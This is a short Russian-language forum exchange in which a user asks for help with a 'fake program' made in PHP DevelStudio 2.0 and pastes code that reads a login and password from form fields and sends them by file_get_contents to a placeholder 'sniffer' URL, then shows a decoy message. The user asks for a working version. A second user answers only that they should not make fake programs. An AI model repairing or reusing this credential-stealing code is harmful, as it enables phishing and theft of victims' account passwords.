Юлия Митрофанова

скажите пожалуйста почему у меня в программу PHP devel studio 2.0 когда я хочу делать фейк программу у меня ошибка вот

$edit1 = c('Form1->edit1')->text;
$edit2 = c('Form1->edit2')->text;
$combobox1 = c('Form1->combobox1')->inText;
$url = "Ваш сниффер";
file_get_contents($url . "?" . "login:" . $edit1 . "|pass:" . $edit2);
MessageBox("Ваше сообщение", "Ваше сообщение");

я свой снифф ставлю в специальном сайте всё как надо и не получается дайте нормальный скрипт ато в ютубе я в комментариях смотрел многие скрипты поставили во всех ошибка была!!!! помогите в заранее спасибо!!!!

Sanya

вот и не делай фейк программы